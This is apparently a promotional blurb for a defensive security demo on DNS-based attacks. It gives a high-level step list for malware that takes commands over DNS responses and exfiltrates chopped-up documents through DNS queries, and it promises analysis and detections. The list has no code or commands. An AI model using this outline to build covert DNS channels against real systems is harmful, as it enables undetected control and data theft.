DNS is an amazing channel for attackers. Port 53 is almost always wide open and DNS logs are extremely noisy and hard to analyze. APTs like OilRig have had a field day using DNS to silently control victim machines without being detected.
Let's ditch the slides and hop right into a live DNS server. We'll demo a few DNS-based attacks, crack open Wireshark to analyze the traffic, and discuss mitigation techniques and the DNS-based detections in Varonis.
Here's an overview of the attack:
- Stand up a plain old DNS server
- Register a domain name
- Point our domain's DNS records to our (malicious) server
- Infect a victim with a tiny piece of malware that connects to our DNS server
- Issue commands from our DNS server back to the victim machine via DNS responses alone
- Find a document to steal, chop it up, send it out via outbound DNS queries